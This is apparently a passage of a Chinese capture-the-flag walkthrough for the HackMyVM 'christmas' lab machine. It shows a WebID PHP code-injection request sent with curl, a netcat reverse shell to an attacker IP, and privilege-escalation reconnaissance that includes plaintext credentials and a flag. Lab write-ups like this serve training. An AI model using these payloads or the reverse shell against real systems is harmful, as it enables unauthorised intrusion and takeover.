http:\/\/christmas.hmv\/webid\/admin\/login.php<\/code><\/pre>\n
\"image-20240402184248109\"<\/div><\/p>\n
\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u9ed8\u8ba4\u7684\u8d26\u53f7\u5bc6\u7801\uff0c\u6ca1\u6709\u53d1\u73b0\uff0c\u4f7f\u7528\u524d\u9762\u7684\u8d26\u53f7\u5bc6\u7801\u767b\u5f55\u4e00\u4e0b\uff0c\u663e\u793a\u767b\u5f55\u5931\u8d25\uff1a<\/p>\n
MyPassword1@2023*<\/code><\/pre>\n
\u731c\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\n
MyPassword2@2023*<\/code><\/pre>\n
\u767b\u5f55\u8fdb\u53bb\u4e86\uff1a<\/p>\n
\"image-20240402184751890\"<\/div><\/p>\n
\u7248\u672c\u53f7\u4e3a\uff1a1.2.2.2 <\/code><\/p>\n
\u6f0f\u6d1e\u641c\u96c6<\/h3>\n
\u67e5\u4e00\u4e0bexploit.db<\/h4>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/christmas\/ftp]\n\u2514\u2500# searchsploit webid 1.2.    \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n
github\u548cgoogle\u627e\u4e00\u4e0b<\/h4>\n
\"image-20240402185019978\"<\/div>
\n
\"image-20240402185222641\"<\/div><\/p>\n
POST \/Webid\/admin\/categoriestrans.php?lang=.. HTTP\/1.1\nHost: localhost\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/118.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: PHPSESSID=sg9ouodbv9fupgvdp5ik8vm1d6\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 41\n\ncategories[123);system("whoami");\/*]=test<\/code><\/pre>\n
\u4e5f\u53ef\u4ee5\u4f7f\u7528\u547d\u4ee4\u884c\uff1a<\/p>\n
curl -i -s -k -X $'POST' \\\n    -H $'Host: localhost' -H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/118.0' -H $'Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Content-Type: application\/x-www-form-urlencoded' -H $'Content-Length: 41' \\\n    -b $'PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \\\n    --data-binary $'categories[123);system(\\"whoami\\");\/*]=test' \\\n    $'http:\/\/localhost\/Webid\/admin\/categoriestrans.php?lang=..'<\/code><\/pre>\n
\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u5220\u9664\u6ca1\u6709\u5fc5\u8981\u7684\u4fe1\u606f\uff0c\u52a0\u4e0a\u81ea\u5df1\u7684\u4fe1\u606f\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u8fd0\u884c\u811a\u672c\u4e86\uff1a<\/p>\n
sed 's\/-H\/\\\\\\n-H\/g' pwn                   # \u6362\u884c\nsed -i 's\/-H\/\\\\\\n-H\/g' pwn                # \u548c\u4e0a\u4e00\u4e2a\u547d\u4ee4\u4e00\u6837\uff0c\u4f46\u662f\u4e0d\u8f93\u51fa\u5230\u7ec8\u7aef<\/code><\/pre>\n
\u7136\u540e\u624b\u52a8\u5220\u51cf\u4e00\u4e0b\uff1a<\/p>\n
curl -i -s -k -X $'POST' \\\n    \\\n-H $'Host: localhost' \\\n-H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/118.0' \\\n-H $'Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8' \\\n-H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh\\\n-HK;q=0.5,en-US;q=0.3,en;q=0.2' \\\n-H $'Accept-Encoding: gzip, deflate' \\\n-H $'Connection: close' \\\n-H $'Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \\\n-H $'Upgrade-Insecure-Requests: 1' \\\n-H $'Sec-Fetch-Dest: document' \\\n-H $'Sec-Fetch-Mode: navigate' \\\n-H $'Sec-Fetch-Site: none' \\\n-H $'Sec-Fetch-User: ?1' \\\n-H $'Content-Type: application\/x-www-form-urlencoded' \\\n-H $'Content-Length: 41' \\\n    -b $'PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \\\n    --data-binary $'categories[123);system(\\"whoami\\");\/*]=test' \\\n    $'http:\/\/localhost\/Webid\/admin\/categoriestrans.php?lang=..'<\/code><\/pre>\n
\u5220\u5b8c\u4e0d\u5fc5\u8981\u7684\u4e1c\u897f\u4ee5\u540e\uff0c\u6dfb\u52a0referer\uff1a<\/p>\n
curl -i -s -k -X $'POST' \\\n-H $'Host: localhost' \\\n-H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/118.0' \\\n-H $'Referer: http:\/\/christmas.hmv\/2fa.php' \\\n-H $'Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8' \\\n-H $'Connection: close' \\\n-H $'Cookie: PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \\\n-H $'Upgrade-Insecure-Requests: 1' \\\n-H $'Sec-Fetch-Dest: document' \\\n-H $'Sec-Fetch-Mode: navigate' \\\n-H $'Sec-Fetch-Site: none' \\\n-H $'Sec-Fetch-User: ?1' \\\n-H $'Content-Type: application\/x-www-form-urlencoded' \\\n    -b $'PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92' \\\n    --data-binary $'categories[123);system(\\"whoami\\");\/*]=test' \\\n    $'http:\/\/localhost\/webid\/admin\/categoriestrans.php?lang=..'<\/code><\/pre>\n
sed -i 's\/PHPSESSID=vnl6peqqqk68l3pfdvf6f7om92\/PHPSESSID=sg9ouodbv9fupgvdp5ik8vm1d6;UserAuthenticated=true\/g' pwn   # \u66f4\u6539cookie<\/code><\/pre>\n
sed -i 's\/localhost\/christmas.hmv\/g' pwn          # \u5207\u6362\u9776\u573a\u7f51\u5740<\/code><\/pre>\n
curl -i -s -k -X $'POST' \\\n-H $'Host: christmas.hmv' \\\n-H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/118.0' \\\n-H $'Referer: http:\/\/christmas.hmv\/2fa.php' \\\n-H $'Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8' \\\n-H $'Connection: close' \\\n-H $'Cookie: PHPSESSID=sg9ouodbv9fupgvdp5ik8vm1d6;UserAuthenticated=true' \\\n-H $'Upgrade-Insecure-Requests: 1' \\\n-H $'Sec-Fetch-Dest: document' \\\n-H $'Sec-Fetch-Mode: navigate' \\\n-H $'Sec-Fetch-Site: none' \\\n-H $'Sec-Fetch-User: ?1' \\\n-H $'Content-Type: application\/x-www-form-urlencoded' \\\n    -b $'PHPSESSID=sg9ouodbv9fupgvdp5ik8vm1d6;UserAuthenticated=true' \\\n    --data-binary $'categories[123);system(\\"whoami\\");\/*]=test' \\\n    $'http:\/\/christmas.hmv\/webid\/admin\/categoriestrans.php?lang=..'<\/code><\/pre>\n
\u6d4b\u8bd5\u4e00\u4e0b\u53d1\u73b0\u6210\u529f\u4e86\uff1a<\/p>\n
\"image-20240402194847216\"<\/div><\/p>\n
\u4e0b\u9762\u8fd8\u6709\u4f46\u662f\u6211\u6ca1\u52a0\u4e0a\u53bb\u4e86\uff0c\u53cd\u5f39shell\uff1a<\/p>\n
nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n
\"image-20240402195221524\"<\/div>
\n
\"image-20240402195233488\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@christmas.hmv:\/var\/www\/html\/webid\/admin$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nftp:x:104:112:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nmysql:x:105:113:MySQL Server,,,:\/nonexistent:\/bin\/false\nmr-jack:x:1000:1000::\/home\/mr-jack:\/bin\/zsh\n(remote) www-data@christmas.hmv:\/var\/www\/html\/webid\/admin$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n#\n(remote) www-data@christmas.hmv:\/var\/www\/html\/webid\/admin$ cd \/home\/mr-jack\n(remote) www-data@christmas.hmv:\/home\/mr-jack$ ls -la\ntotal 388\ndrwxr-xr-x  6 mr-jack mr-jack   4096 Nov 18 12:58 .\ndrwxr-xr-x  3 root    root      4096 Nov 13 16:55 ..\nlrwxrwxrwx  1 root    root         9 Nov 18 12:58 .bash_history -> \/dev\/null\n-rw-r--r--  1 mr-jack mr-jack    220 Dec 25 00:00 .bash_logout\n-rw-r--r--  1 mr-jack mr-jack   3526 Dec 25 00:00 .bashrc\ndrwxr-xr-x  4 mr-jack mr-jack   4096 Dec 25 00:00 .config\ndrwxr-xr-x  3 mr-jack mr-jack   4096 Dec 25 00:00 .local\ndrwxr-xr-x 12 mr-jack mr-jack   4096 Dec 25 00:00 .oh-my-zsh\n-rw-r--r--  1 mr-jack mr-jack    807 Dec 25 00:00 .profile\ndrwx------  2 mr-jack mr-jack   4096 Nov 18 10:44 .ssh\n-rw-r--r--  1 mr-jack mr-jack  51816 Nov 17 18:22 .zcompdump-christmas-5.9\n-r--r--r--  1 mr-jack mr-jack 119928 Nov 17 18:22 .zcompdump-christmas-5.9.zwc\n-rw-r--r--  1 mr-jack mr-jack  51816 Dec 25 00:00 .zcompdump-debian-5.9\n-r--r--r--  1 mr-jack mr-jack 119920 Dec 25 00:00 .zcompdump-debian-5.9.zwc\n-rw-r--r--  1 mr-jack mr-jack   3890 Dec 25 00:00 .zshrc\n-rwx------  1 mr-jack mr-jack     33 Dec 25 00:00 user.txt\n(remote) www-data@christmas.hmv:\/home\/mr-jack$ cat user.txt\ncat: user.txt: Permission denied\n(remote) www-data@christmas.hmv:\/home\/mr-jack$ cd .config\n(remote) www-data@christmas.hmv:\/home\/mr-jack\/.config$ ls -la\ntotal 16\ndrwxr-xr-x  4 mr-jack mr-jack 4096 Dec 25 00:00 .\ndrwxr-xr-x  6 mr-jack mr-jack 4096 Nov 18 12:58 ..\ndr-xr-xr-x+ 2 mr-jack mr-jack 4096 Dec 25 00:00 .SecureGateway\ndrwx------  3 mr-jack mr-jack 4096 Apr  2 12:22 syncthing\n(remote) www-data@christmas.hmv:\/home\/mr-jack\/.config$ cd .SecureGateway\/\n(remote) www-data@christmas.hmv:\/home\/mr-jack\/.config\/.SecureGateway$ ls -la\ntotal 12\ndr-xr-xr-x+ 2 mr-jack mr-jack 4096 Dec 25 00:00 .\ndrwxr-xr-x  4 mr-jack mr-jack 4096 Dec 25 00:00 ..\n-rwxr-xr-x  1 mr-jack mr-jack 1073 Dec 25 00:00 firewall_config.conf\n(remote) www-data@christmas.hmv:\/home\/mr-jack\/.config\/.SecureGateway$ cat firewall_config.conf \n# Example Firewall Configuration File - firewall_config.conf\nFirewallName = "ChristmasSecureGateway"\nManufacturer = "Christmas Technologies"\nModel = "XMAS-FW1000"\nFirmwareVersion = "2023.1"\nManagementInterface = "eth0"\nManagementIP = "192.168.100.1"\nInternalInterface = "eth1"\nInternalIPRange = "192.168.0.0\/24"\nExternalInterface = "eth2"\nExternalIP = "203.0.113.5"\nNAT = "Enabled"\nALLOW 192.168.0.0\/24 Any IP Any\nDENY Any Any IP 23\nDENY Any Any IP 21\nRDP 203.0.113.5:3389 -> 192.168.0.10:3389\nHTTP 203.0.113.5:80 -> 192.168.0.20:80\nVPNType = "OpenVPN"\nVPNServerIP = "192.168.100.2"\nVPNPort = 1194\nEncryption = "AES-256-CBC"\nWebInterface = "https:\/\/192.168.100.1:8080"\nAPIEndpoint = "https:\/\/192.168.100.1\/api"\nAdminPortalURL = "https:\/\/mr-jack:m3rrychr157m4523@192.168.100.1:8080\/login"\nSyslogServer = "192.168.100.10"\nLogLevel = "Info"\nAuditTrail = "Enabled"\nIntrusionPreventionSystem = "Enabled"\nAntiVirus = "Enabled"\nAntiSpyware = "Enabled"\nAutoUpdate = "Enabled"\nUpdateServer = "https:\/\/update.christmas.hmv"\nLastUpdateCheck = "2023-03-01"\n# End of Configuration File<\/code><\/pre>\n
\u627e\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
mr-jack\nm3rrychr157m4523<\/code><\/pre>\n
\u5207\u6362mr-jack<\/h3>\n
(remote) www-data@christmas.hmv:\/home\/mr-jack\/.config\/.SecureGateway$ su mr-jack\nPassword: \n\u256d\u2500mr-jack@christmas ~\/.config\/.SecureGateway \n\u2570\u2500$ \n\u256d\u2500mr-jack@christmas ~\/.config\/.SecureGateway \n\u2570\u2500$ cd ..\/..\/\n\u256d\u2500mr-jack@christmas ~ \n\u2570\u2500$ ls\nuser.txt\n\u256d\u2500mr-jack@christmas ~ \n\u2570\u2500$ cat user.txt\ncaf45c355c29186bb9d8ab89f7811bf0\n\u256d\u2500mr-jack@christmas ~ \n\u2570\u2500$ sudo -l\nMatching Defaults entries for mr-jack on christmas:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser mr-jack may run the following commands on christmas:\n    (ALL : ALL) NOPASSWD: \/opt\/GiftPursuit<\/code><\/pre>\n
\u770b\u770b\u8fd9\u4e2a\u4e1c\u897f\uff1a<\/p>\n
\u256d\u2500mr-jack@christmas ~ \n\u2570\u2500$ cd \/opt  \n\u256d\u2500mr-jack@christmas \/opt \n\u2570\u2500$ ls\nGiftPursuit\n\u256d\u2500mr-jack@christmas \/opt \n\u2570\u2500$ file GiftPursuit \nGiftPursuit: Bourne-Again shell script, Unicode text, UTF-8 text executable\n\u256d\u2500mr-jack@christmas \/opt \n\u2570\u2500$ cat GiftPursuit \n#!\/bin\/bash\n\nif [[ "$#" -eq 0 ]] ; then\n  echo "\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84"\n  echo -e "\\nUsage: $0 number\\n"\n  echo "\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84\ud83c\udf84"\n  exit 1\nfi  \n\nNUMBER=$(openssl rand -hex 45 |tr -dc "0-9" |head -c 40)\n\nif [[ "${NUMBER}" -eq "${1}" ]] ; then \n  echo "Here's your Christmas gift !"\n  chmod o+s \/bin\/bash\nelse\n  echo "No ! If you want a gift, try hard !"\n  exit 1\nfi<\/code><\/pre>\n